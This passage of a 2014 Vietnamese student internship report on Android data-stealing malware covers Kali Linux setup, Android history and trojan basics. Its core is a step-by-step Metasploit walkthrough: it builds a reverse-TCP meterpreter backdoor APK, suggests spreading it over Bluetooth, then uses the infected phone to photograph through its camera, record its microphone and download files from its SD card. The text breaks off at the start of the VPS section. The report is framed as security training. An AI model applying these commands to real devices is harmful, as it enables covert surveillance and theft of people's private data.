Báo cáo thực tập Athena

ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH
TRƯỜNG ĐẠI HỌC BÁCH KHOA
KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH
TRUNG TÂM ĐÀO TẠO
QUẢN TRỊ MẠNG & AN NINH
MẠNG QUỐC TẾ ATHENA
BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT
Nghiên cứu các phần mềm cho phép đánh cắp dữ liệu
trên các thiết bị di động sử dụng hệ điều hành Android
GVHD: Thầy VÕ ĐỖ THẮNG
SVTH: Lý Khánh Trung
MSSV: 51103866
TPHCM, ngày 11 tháng 08 năm 2014

BÁO CÁO THỰC TẬP – GVHD VÕ ĐỖ THẮNG
SVTT LÝ KHÁNH TRUNG 2
TRÍCH YẾU
Hiện nay, vấn đề “An toàn và bảo mật thông tin” đang ngày càng được
mọi người quan tâm. Với sự phát triển đến chóng mặt của các nền tảng di động
như iOS, Android, Windows Phone cùng với nhiều dòng điện thoại thông minh
xuất hiện như Apple, Samsung, Nokia, HTC,… thì vấn đề bảo mật thông tin ngày
càng được chú trọng. Nếu bạn đang sở hữu một chiếc smartphone, liệu bạn có
đảm bảo là thiết bị của mình không bị nhiễm các phần mềm gián điệp, nghe lén
không? Dựa theo các thống kê gần đây bởi các hãng phần mềm bảo mật hàng
đầu ở Việt Nam như Kaspersky Lab, Norton AV, Avast hay BKAV thì số lượng
smartphone bị nhiễm mã độc ngày càng tăng theo hằng năm. Đặc biệt số người
sử dụng smartphone có hệ điều hành Android tăng lên khá nhanh trong những
năm gần đây luôn là một mảnh đất béo bở cho các Hacker tấn công. Với sự
thiếu hiểu biết của người dùng, luôn thích những gì “free”, ứng ụng free, wifi
free đã vô tình tiếp tay cho các Hacker xâm nhập và cài đặt mã độc trên chính
chiếc điện thoại của họ.
Hôm nay mình viết bài báo cáo về đề tài “Nghiên cứu các phần mềm cho phép
đánh cắp dữ liệu trên các thiết bị di động sử dụng hệ điều hành Android” để
cùng nghiên cứu, tìm hiểu cách thức hoạt động, chia sẻ thông tin cũng như
cung cấp các giải pháp để phòng tránh. Tôi xin cam đoan mọi kết quả đạt được
dưới đây là do tôi tự thực hiện dưới sự hướng dẫn của thầy Võ Đỗ Thắng. Danh
sách các video hướng dẫn được liệt kê bên dưới:
 Giới thiệu bản thân: https://www.youtube.com/watch?v=jDLTLxXzKXI
 Hướng dẫn cài đặt Kali Linux:
o https://www.youtube.com/watch?v=aE-3faXEpyc
 Tạo mã độc trên Localhost (Kali Linux):
o https://www.youtube.com/watch?v=eAqN9bfRIKQ
 Tạo mã độc trên VPS: https://www.youtube.com/watch?v=NuZILKDvaSA
 Thuận lợi, khó khăn và kết quả đạt được:
o https://www.youtube.com/watch?v=S88NbVlPg1w

Lời cảm ơn Đại học Bách Khoa Tp HCM
Em xin chân thành cảm ơn trường Đại học Bách Khoa và Khoa Khoa học
và Kĩ thuật Máy tính đã tạo điều kiện tốt để em hoàn thành đợt thực tập này.
Trong đợt thực tập này đã cho em những kinh nghiệm quý báu, rất có ích, sẽ
giúp em hoàn thiện ơn trong công việc và môi trường làm việc sau này.
Dù cho em đã cố gắng hoàn thành tốt báo cáo thực tập với tất cả nỗ lực
của bản thân nhưng do kiến thức cũng như kinh nghiệm chưa nhiều nên sẽ
không tránh khỏi thiết sót, rất mong nhận được thông cảm, chia sẻ và tận tình
để em hoàn thành báo cáo thực tập tốt hơn.
Một lần nữa em xin chân thành cảm ơn.
Hồ Chí Minh, Ngày 11 Tháng 8 Năm 2014
Sinh viên thực tập
Lý Khánh Trung

Lời cảm ơn Trung tâm Athena
Em xin chân thành cảm ơn Ban giám đốc Trung Tâm Đào Tạo Quản Trị
Mạng và An Ninh Mạng Quốc Tế Athena, thầy Võ Đỗ Thắng và toàn thể các anh
chị trong công ty đã tận tình giúp đỡ em trong thời gian thực tập vừa qua, tạo
điều kiện để em có cơ hội thực tập tốt tại trung tâm.
Trong đợt thực tập này đã cho em những kinh nghiệm quý báu, rất có
ích, sẽ giúp em hoàn thiện ơn trong công việc và môi trường làm việc sau này.
Dù cho em đã cố gắng hoàn thành tốt báo cáo thực tập với tất cả nỗ lực
của bản thân nhưng do kiến thức cũng như kinh nghiệm chưa nhiều nên sẽ
không tránh khỏi thiết sót, rất mong nhận được thông cảm, chia sẻ và tận tình
để em hoàn thành báo cáo thực tập tốt hơn.
Một lần nữa em xin chân thành cảm ơn.
Hồ Chí Minh, Ngày 11 Tháng 8 Năm 2014
Sinh viên thực tập
Lý Khánh Trung
Hình chụp GVHD Võ Đỗ Thắng (trái) và SVTT Lý Khánh Trung (phải)

NHẬN XÉT CỦA KHOA
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Trưởng Khoa

NHẬN XÉT CỦA CÔNG TY THỰC TẬP
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
Giám đốc

NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
Giáo viên hướng dẫn

Mục lục
TRÍCH YẾU......................................................................................................................................................2
Lời cảm ơn Đại học Bách Khoa Tp HCM............................................................................................3
Lời cảm ơn Trung tâm Athena ..............................................................................................................4
NHẬN XÉT CỦA KHOA ..............................................................................................................................5
NHẬN XÉT CỦA CÔNG TY THỰC TẬP ................................................................................................6
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN........................................................................................7
Mục lục.............................................................................................................................................................8
CHƯƠNG 1: GIỚI THIỆU VỀ ATHENA................................................................................................9
1.1. Lĩnh vực hoạt động chính...........................................................................................................9
1.2. Đội ngũ giảng viên...................................................................................................................... 10
1.3. Cơ sở vật chất............................................................................................................................... 10
1.4. Dịch vụ hỗ trợ............................................................................................................................... 10
CHƯƠNG 2: NỘI DUNG THỰC TẬP .................................................................................................. 12
2.1 Thực hiện trên Localhost ......................................................................................................... 12
2.1.1 Giới thiệu hệ điều hành Kali Linux.............................................................................. 12
2.1.2 Hướng dẫn cài đặt hệ điều hành Kali Linux trên Vmware ............................... 13
2.1.3 Giới thiệu hệ điều hành Android.................................................................................. 27
2.1.4 Giới thiệu sơ lược về trojan và malware .................................................................. 28
2.1.5 Tạo mã độc trên Kali Linux............................................................................................. 31
2.1.6 Xâm nhập SDcard của thiết bị Android bị nhiễm.................................................. 39
2.2 Thực hiện trên Virtual Private Server – VPS................................................................... 41
2.2.1 Giới thiệu về VPS................................................................................................................. 41
2.2.2 Hướng dẫn cài đặt Metasploit để tạo mã độc trên VPS...................................... 42
2.2.3 Tiến hành xâm nhập thiết bị Android từ VPS......................................................... 48
CHƯƠNG 3: TỔNG KẾT.......................................................................................................................... 52

CHƯƠNG 1: GIỚI THIỆU VỀ ATHENA
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được
thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng
động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần
vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi
nhọn, góp phần phát triển nước nhà.
1.1. Lĩnh vực hoạt động chính
Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên
sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc
tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song
song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành
riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân
hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..
Sau gần 10 năm hoạt động, nhiều học viên tốt nghiệp trung
tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh
mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ
Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,...
Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình
hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành
Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân (Thủ Đức), Học Viện Bưu Chính
Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,..

1.2. Đội ngũ giảng viên
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường
đại học hàng đầu trong nước như Đại Học Bách Khoa, Đại Học Khoa Học Tự
Nhiên,....Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA,
MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified
Trainer). Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia
giảng dạy tại trung tâm ATHENA.
Bên cạnh đó, Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến
thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,...
và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung
tâm ATHENA
1.3. Cơ sở vật chất
Thiết bị đầy đủ và hiện đại
Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
Phòng máy rộng rãi, thoáng mát
1.4. Dịch vụ hỗ trợ
Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
Giới thiệu việc làm cho mọi học viên

Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không
giới hạn thời gian.
Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng
Cơ sở 1: 92 Nguyễn Đình Chiểu, P.Đa Kao, Q.1
Điện thoại: (08)38244041 - 090 78 79 477-094 323 00 99 (Gần ngã tư Đinh Tiên
Hoàng - Nguyễn Đình Chiểu).
Cơ sở 2: 2 Bis Đinh Tiên Hoàng, P.Đa Kao, Q.1.
Điện thoại: (08)22103801 - 094 320 00 88(Cạnh sân vận động Hoa Lư – Cách đài
truyền hình Tp HTV 50 mét).
Website: http://athena.edu.vn - http://athena.com.vn
E-mail : support@athena.edu.vn - tuvan@athena.edu.vn

CHƯƠNG 2: NỘI DUNG THỰC TẬP
2.1 Thực hiện trên Localhost
2.1.1 Giới thiệu hệ điều hành Kali Linux
Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết
kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân
của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá
bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013,
hãng Offensive Security đã công bố phiên bản mới của BackTrack có tên là Kali
Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần
như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng
cần sử dụng khi tác nghiệp.
Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali.
So với BackTrack, Kali có rất nhiều cải tiến:
 Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho
lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể
dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật
Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là
một yêu cầu vô cùng quan trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý
gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về
mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn
trong việc xem xét hoặc thay đổi mã nguồn của các công cụ.

 Tính tương thích kiến trúc
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích
với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo
ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy
Note.
 Hỗ trợ mạng không dây tốt hơn
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất,
chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng
không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật
thực hiện đánh giá mạng không dây.
 Khả năng tùy biến cao
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống.
Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại
Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.
 Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì
hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố
thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm
ngoái).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian,
Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện,
người dùng không phải cài lại mới hoàn toàn nữa
2.1.2 Hướng dẫn cài đặt hệ điều hành Kali Linux trên Vmware
Trước tiên các bạn có thể tải tập tin dạng iso phiên bản mới nhất của Kali
Linux ở liên kết http://www.kali.org/downloads/ , ở đây ta sẽ cài phiên bản Kali
Linux 1.0.7 64bit.

Nếu là dân công nghệ thì ít nhiều bạn sẽ biết đến phần mềm có tên là
Vmware. Vmware Worktration là phần mềm tạo máy ảo hàng đầu, rất được ưa
chuộng hiện nay. Bạn có thể dùng Vmware để tạo một máy tính ảo chạy Windows
, Linux hay thậm chí là Android nữa. VMware Workstation 10 là một phần mềm
giả lập hệ điều hành để bàn rất nổi tiếng của hãng VMware Inc. Với hơn 50 tính
năng mới, có thể thay đổi đáng kể cách thức làm việc với các máy ảo.
Từ Giao diện chính của Vmware thì nhấn vào File -> New Vitual Machine
(hoặc dùng phím tắt Crtl + N).
Chọn Typical và nhấn next. Đây là những cài đặt mà Vmware khuyên dùng
nếu muốn tự thiết lập những tùy chọn thì nhấn vào Custom. Nếu không rành thì
tốt nhất cứ chọn Typical đỡ phiền sau này. Ở đây mình chọn Custom và nhấn
next.

Tích vào Installer Disc image file. Và chọn đến file ISO cần cài đặt Vmware
sẽ tự nhận diện đó là file iso của hệ điều hành nào. Và sẽ bắt nhập Product Key(
Có thể nhập sau cũng được)

Sau đó sẽ chọn tên máy ảo và nơi lưu trữ dữ liệu của nó
Ở những bước sau thì cứ nhấn Next. Đến đây thì có 1 tùy chọn là
”Customize Hardware…”. Cái này để thay đổi các thông số như dung lượng RAM
(cá nhân mình thì đề nghị nên sử dụng chỉ 512MB), Ổ cứng, USb Controler…
Cũng tùy vào hệ điều hành đang cài mà chọn dung lượng cho phù hợp.
Vmware cũng đã chọn cho mình 1 dung lượng phù hợp rồi.

Sau khi hoàn thành các bước này thì máy ảo sẽ tự động bật và sẽ tiến hành
cài đặt 1 cách tự động. Tùy vào dung lượng mà quá trình sẽ diễn ra nhanh hay
chậm thông thường thì mất vài chục phút cho đến vài giờ. Tuy nhiên với những
file ISO không hỗ trợ nhận diện tự động thì bạn vẫn sẽ phải cài bằng tay từng
bước như cài win bình thường.
Bạn sẽ nhìn thấy màn hình khởi động của Kali. Chọn một trong hai chế độ
cài đặt là Graphical hoặc Text-Mode. Trong bài viết này tôi sẽ chọn Graphical
Install

Chọn ngôn ngữ, vị trí đất nước của bạn sau đó click Continue

Bạn cũng sẽ được yêu cầu để cấu hình bàn phím với bàn phím bạn đang sử
dụng.

Bạn sẽ cần phải cấu hình Network và Password cho tài khoản Root, thiết
lập giờ.

Tiếp đến bạn sẽ lựa chọn ổ đĩa bạn sẽ cài đặt Kali.

Sau khi cấu hình Partition xong, nhấn Continue để quá trình cài đặt bắt đầu.
Cấu hình Mirror. Kali sử dụng một kho lưu trữ trung tâm để phân phối các
ứng dụng. Bạn sẽ cần phải nhập thông tin proxy thích hợp khi cần thiết. Chú
ý: Nếu bạn chọn “No” trong màn hình này, bạn sẽ không thể cài đặt các gói từ kho
lưu trữ của Kali.

Tiếp đến là cài đặt GRUB
Cuối cùng, nhấp vào Continue để khởi động lại Kali.

Màn hình đăng nhập và sau khi bạn đăng nhập vào Kali.
Giao diện sau khi cài đặt xong:
Tới đây ta đã cài đặt thành công!!!

2.1.3 Giới thiệu hệ điều hành Android
Android là một hệ điều hành dựa trên nền tảng Linux được thiết kế dành
cho các thiết bị di động có màn hình cảm ứng như điện thoại thông minh và máy
tính bảng. Ban đầu, Android được phát triển bởi Tổng công ty Android, với sự hỗ
trợ tài chính từ Google và sau này được chính Google mua lại vào năm
2005. Android ra mắt vào năm 2007 cùng với tuyên bố thành lập Liên minh thiết
bị cầm tay mở: một hiệp hội gồm các công ty phần cứng, phần mềm, và viễn
thông với mục tiêu đẩy mạnh các tiêu chuẩn mở cho các thiết bị di động. Chiếc
điện thoại đầu tiên chạy Android được bán vào tháng 10 năm 2008.
Lịch sử:
Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California
vào tháng 10 năm 2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich Miner
(đồng sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từng là Phó giám đốc T-
Mobile), và Chris White (trưởng thiết kế và giao diện tại WebTV) để phát triển, theo
lời của Rubin, "các thiết bị di động thông minh hơn có thể biết được vị trí và sở thích
của người dùng". Dù những người thành lập và nhân viên đều là những người có
tiếng tăm, Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ rằng họ
đang làm phần mềm dành cho điện thoại di động. Trong năm đó, Rubin hết kinh phí.
Steve Perlman, một người bạn thân của Rubin, mang cho ông 10.000 USD tiền mặt
nhưng từ chối tham gia vào công ty.
Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó
thành một bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công
ty Android, gồm Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương
vụ này. Vào thời điểm đó không có nhiều thông tin về Tổng công ty, nhưng nhiều
người đồn đoán rằng Google dự tính tham gia thị trường điện thoại di động sau bước
đi này. Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di
động phát triển trên nền nhân Linux. Google quảng bá nền tảng này cho các nhà sản
xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ thống uyển chuyển
và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng phần cứng cũng như
đối tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ
khác nhau.
Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di
động xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú
thích rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện
thoại di động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện
truyền thông truyền thống lẫn online cũng viết về tin đồn rằng Google đang phát triển
một thiết bị cầm tay mang thương hiệu Google. Một vài tờ báo còn nói rằng trong khi

Google vẫn đang thực hiện những bản mô tả kỹ thuật chi tiết, họ đã trình diễn sản
phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng. Tháng 9 năm 2007,
InformationWeek đăng tải một nghiên cứu của Evalueserve cho biết Google đã nộp
một số đơn xin cấp bằng sáng chế trong lĩnh vực điện thoại di động.
Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một
hiệp hội bao gồm nhiều công ty trong đó có Texas Instruments,Tập đoàn Broadcom,
Google, HTC, Intel, LG, Tập đoàn MarvellTechnology, Motorola, Nvidia, Qualcomm,
Samsung Electronics, Sprint Nextel và T-Mobile được thành lập với mục đích phát
triển các tiêu chuẩn mở cho thiết bị di động. Cùng ngày, Android cũng được ra mắt
với vai trò là sản phẩm đầu tiên của Liên minh, một nền tảng thiết bị di động được
xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện thoại chạy Android đầu tiên được
bán ra là HTC Dream, phát hành ngày 22 tháng 10 năm 2008. Biểu tượng của hệ điều
hành Android mới là một con rôbốt màu xanh lá cây do hãng thiết kế Irina Blok tại
California vẽ.
Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ
điều hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành trước.
Mỗi bản nâng cấp được đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một
món ăn tráng miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bông lan nhỏ có kem)
tiếp nối bằng phiên bản 1.6 Donut (bánh vòng). Phiên bản mới nhất (chính thức) là
4.4 KitKat (bánh chocolate). Vào năm 2010, Google ra mắt loạt thiết bị Nexus - một
dòng sản phẩm bao gồm điện thoại thông minh và máy tính bảng chạy hệ điều hành
Android, do các đối tác phần cứng sản xuất. HTC đã hợp tác với Google trong chiếc
điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó nhiều thiết bị mới hơn đã
gia nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính bảng Nexus 10,
lần lượt do LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng Nexus
là những thiết bị Android chủ lực của mình, với những tính năng phần cứng và phần
mềm mới nhất của Android.
2.1.4 Giới thiệu sơ lược về trojan và malware
Trojan:
 Định nghĩa: Trojan horse, tiếng Anh của Ngựa Troia, là một loại phần
mềm ác tính. Không giống như virus, nó không có chức năng tự sao
chép nhưng lại có chức năng hủy hoại tương tự virus. Một trong
những thứ giăng bẫy của Ngựa Troia là nó tự nhận là giúp cho máy

của thân chủ chống lại các virus nhưng thay vì làm vậy nó quay ra
đem virus vào máy.
 Đặc điểm:
o Trojan horse là chương trình máy tính thường ẩn mình dưới dạng một
chương trình hữu ích và có những chức năng mong muốn, hay ít nhất
chúng trông như có các tính năng này. Một cách bí mật, nó lại tiến hành
các thao tác khác không mong muốn. Những chức năng mong muốn chỉ
là phần bề mặt giả tạo nhằm che giấu cho các thao tác này.
o Trong thực tế, nhiều Trojan horse chứa đựng các phần mềm gián
điệp nhằm cho phép máy tính thân chủ bị điều khiển từ xa qua hệ thống
mạng.
o Khác nhau căn bản với virus máy tính là Trojan Horse về mặt kỹ thuật chỉ
là một phần mềm thông thường và không có ý nghĩa tự lan truyền. Các
chương trình này chỉ lừa người dùng để tiến hành các thao tác khác mà
thân chủ sẽ không tự nguyện cho phép tiến hành. Ngày nay, các Trojan
horse đã được thêm vào đó các chức năng tự phân tán. Điều này đẩy khái
niện Trojan horse đến gần với khái niệm virus và chúng trở thành khó
phân biệt.
 Các kiểu gây hại:
o Xoá hay viết lại các dữ liệu trên máy tính
o Làm hỏng chức năng của các tệp
o Lây nhiễm các phần mềm ác tính khác như là virus
o Cài đặt mạng để máy có thể bị điều khiển bởi máy khác hay dùng máy
nhiễm để gửi thư nhũng lạm
o Đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác (xem
thêm phần mềm gián điệp)
o Ăn cắp thông tin như là mật khẩu và số thẻ tín dụng
o Cài đặt lén các phần mềm chưa được cho phép
 Các kiểu tấn công:
o Trên các máy Microsoft Windows, người tấn công có thể đính kèm một
Trojan horse vào một cái tên có vẻ lương thiện vào trong một thư điện tử
với việc khuyến dụ người đọc mở đính kèm ra. Trojan horse thường là các
tệp khả thi trên Windows và do đó sẽ có các đuôi như
là.exe,.com,.scr,.bat, hay.pif. Trong nhiều ứng dụng của Windows đã có
cấu hình mặc định không cho phép hiển thị các đuôi này. Do đó, nếu một
Trojan horse có tên chẳng hạn là "Readme.txt.exe" thì tệp này sẽ hiển thị

một cách mặc định thành "Readme.txt" và nó sẽ đánh lừa người dùng
rằng đây chỉ là một loại hồ sơ văn bản không thể gây hại.
o Các biểu tượng cũng có thể được gán với các loại tệp khác nhau và có thể
được đính kèm vào thư điện tử. Khi người dùng mở các biểu tượng này
thì các Trojan horse ẩn giấu sẽ tiến hành những tác hại bất ngờ. Hiện nay,
các Trojan horse không chỉ xoá các tệp, bí mật điều chỉnh cấu hình của
máy tính bị nhiễm mà còn dùng máy này như là một cơ sở để tấn công
các máy khác trong mạng.
o Lợi dụng một số lỗi của trình duyệt web, chẳng hạn như Internet
Explorer, để nhúng Trojan vào một trang web, khi người dùng xem trang
này sẽ bị nhiễm. Người dùng nên cập nhật các bản vá lỗithường xuyên và
dùng một trình duyệt web có độ bảo mật cao nhưFirefox và Google
chrome
 Cách phòng chống: cách hữu hiệu nhất là đừng bao giờ mở các đính
kèm được gửi đến một cách bất ngờ. Khi các đính kèm không được
mở ra thì Trojan horse cũng không thể hoạt động. Cẩn thận với ngay
cả các thư điện tử gửi từ các địa chỉ quen biết. Trong trường hợp biết
chắc là có đính kèm từ nơi gửi quen biết thì vẩn cần phải thử lại bằng
các chương trình chống virus trước khi mở nó. Các tệp tải về từ các
dịch vụ chia sẻ tệp như là Kazaa hay Gnutella rất đáng nghi ngờ, vì
các dịch vụ này thường bị dùng như là chỗ để lan truyền Trojan
horse.
Malware: là sự ghép của hai chữ malicious và software) là một loạiphần
mềm hệ thống do các tay tin tặc hay các kẻ nghịch ngợm tạo ra nhằm gây hại cho
các máy tính. Tùy theo cách thức mà tin tặc dùng, sự nguy hại của các loại phần
mềm ác ý có khác nhau từ chỗ chỉ hiển thị các cửa sổ hù dọa cho đến việc tấn
công chiếm máy và lây lan sang các máy khác như là virus trong cơ thể của
các sinh vật.

2.1.5 Tạo mã độc trên Kali Linux
Để thực hiện, ta sử dụng Metasploit framework trên Kali Linux vừa cài đặt ở
trên để tạo một payload, khi thiết bị android tải về và mở payload lên thì sẽ bị
xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng VMware, ta nên
thiết lập phần Network như sau:
Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware

Bấm vào Network Adapter và chọn Bridged: connection directly to the
physical network
Chọn Edit -> Virtual Network Editor...

Trên phần Bridge (connect VMs directly to the external network) chọn
adapter của máy thật
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển thiết bị
android:
 Đầu tiên mở terminal và gõ dòng lệnh ifconfig để xem ip của máy tấn
công Kali

 Nhập vào lệnh dưới đây:
msfpayload android/meterpreter/reverse_tcp lhost=192.168.138.131
lport=8080 R > /root/Desktop/files.apk

192.168.168.131 là địa chỉ IP của máy Kali mà ta vừa tìm được bên trên
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử
dụng (0-1023)
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một
Metasploit reverse tcp backdoor.
Tiếp theo, gõ lệnh msfconsole. Bước này có thể sẽ đợi một chút.

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về
bằng cách gõ lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.138.131 – [nhập địa chỉ IP giống với khi tạo payload ở
trên].
set lport 8080 – [nhập port giống với port khi tạo payload ở trên].
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Tới đây ta chỉ đợi cho thiết bị android đó bị nhiễm mã độc vừa tạo (tải
files.apk, đưa vào thiết bị thông qua bluetooth…), ta tiến hành đánh cắp
thông tin. Sau đây là một số cách điều khiển thiết bị từ máy tấn công Kali.
 Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera
xem ở danh sách camera ở phần trước. Ví dụ như sau:

File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở
/root của máy.
 Ghi âm
Để thực hiện ghi âm, nhập lệnh record_mic và file ghi âm sẽ được lưu về
máy

2.1.6 Xâm nhập SDcard của thiết bị Android bị nhiễm
Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư
mục
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard

Dùng lệnh cd /sdcard/Download để vào thư mục
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh
Download App.apk
Và file này sẽ được tải về thư mục /root của máy Kali

2.2 Thực hiện trên Virtual Private Server – VPS
2.2.1 Giới thiệu về VPS
VPS là gì?
Máy chủ ảo hay Máy chủ riêng ảo (Virtual Private Server - VPS) là phương
pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo.
